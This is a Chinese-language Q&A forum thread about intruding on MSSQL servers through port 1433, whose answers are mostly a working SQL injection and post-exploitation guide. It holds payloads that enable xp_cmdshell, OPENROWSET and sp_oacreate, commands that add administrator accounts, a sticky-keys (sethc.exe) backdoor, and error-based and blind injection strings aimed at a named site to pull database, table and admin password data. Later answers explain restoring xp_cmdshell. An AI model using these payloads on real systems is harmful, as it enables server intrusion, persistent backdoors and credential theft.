1433端口入侵,SQL存储过程问题~急!

发布网友 发布时间：2022-04-11 17:57

我来回答

共4个回答

热心网友 时间：2022-04-11 19:26

MSSQL2005 手工盲注详解
一.开启扩展1.开启xp_cmdshellEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--关闭xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
(添加xplog70.dll)2.开启'OPENROWSET'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--查询分析器里执行select * from openrowset('microsoft.jet.oledb.4.0','
;database=c:\windows\system32\ias\ias.mdb',
'select shell("cmd.exe /c net user admin admin1234 /add")')来利用沙盘来添加个管理员3.开启'sp_oacreate'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Proceres',1;RECONFIGURE;--拷贝文件d:\windows\explorer.exe 至sethc.exe
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out ;exec sp_oamethod @o, 'copyfile',null,'d:\windows\explorer.exe' ,'c:\sethc.exe';在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user xcode xcode /add'
这段代码就是利用SP_OAcreate来添加一个xcode的系统用户 然后直接提升为管理员权限declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来二.有显错，暴。and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--依次提交 dbid = 2.3.4... 得到更多的数据库名and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--折半法得到表个数(假设暴出库名employ)and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--爆出一个表名假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in ('employ_qj' 以此一直加条件...and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--爆出一个列名假设暴出字段名为"id"则在上面语句上加上条件 and name not is('id') 以此一直加条件....或者爆库语句
and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--爆表语句,somedb部份是所要列的数据库
and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--爆字段语句，爆表admin里user='admin'的密码段
And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where user='admin' Order by [password]) T Order by [password]Desc)=0--三.无显错，盲注。先说下SQL2005中的查询方法select * from master.dbo.sysdatabases --查询数据库select * from NetBook.dbo.sysobjects where xtype='u' --查询数据库NetBook里的表select * from NetBook.dbo.syscolumns where id=object_id('book') --查询book表里的字段判断权限：
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))盲注常规步骤：判断库是否确实为MSSQL2005：
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'猜数据库名：先猜dbid：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
根据dbid猜库名，先猜出长度：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1猜表名（假设库名已经猜出为database）：可以尝试先看有没管理表：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1猜第一个，先长度：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1
猜第一个表名，逐位猜：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1
猜第二个表名（假设第一个为table1）：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1
...猜字段（假设表名已经猜出为table）：猜第一个字段：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
猜第二个（假设第一个为column1）
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1
...猜数据（假设要猜的字段为name）：http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.table where name in (select top 1 name from database_db.dbo.table) and ascii(substring(name,1,1))>90)=1
...四.其他一些语句(列目录)1.查看驱动器建表p(i为自动编号,a记录盘符类似"c:\",b记录可用字节,其它省略)
;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--;insert p exec xp_availablemedia;--列出所有驱动器并插入表pand (select count(*) from p)>3;--折半法查出驱动器总数and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)
上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名and (select a from p where i=1)>3;--报错得到第一个驱动器名
上面一般用于显错情况下使用-------以此类推,得到所有驱动器名;drop table p;--删除表p
2.查看目录;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)\;insert pa exec xp_dirtree 'e:';--列出驱动器e并插入表paand (select count(*) from pa where i>0)>-1;--折半法查出i深度and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错得到深度i=1的第一个目录名
上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长度
and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一个目录名的第一个字符长度
上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录;drop table pa;--删除表pa经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)

热心网友 时间：2022-04-11 20:44

貌似吧，你连接的机器都是普通用户或者你连接的是SQL2005，xp_cmdshell默认是被禁止使用的 使用xp_cmdshell会得类似这样的提示：
!x,V.tQ~~*N5FP)I0SQL Server blocked access to procere 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server.
如果你是管理员，可以用以下语句启用xp_首先用SQL Server Management Studio Express连接到数据库服务器，然后运行下面的SQL语句：
sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure
go
然后你就可以使用xp_cmdshell了。

热心网友 时间：2022-04-11 22:19

呵呵，又是1433 未能找到存储过程 'master..xp_cmdshell'，执行下面代码create procere sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO恢复存储过程'master..xpcmdshell'：EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 删除存储过程
drop procere sp_addextendedproc 很基础的知识，闲着没事的时候自己去看看T-SQL吧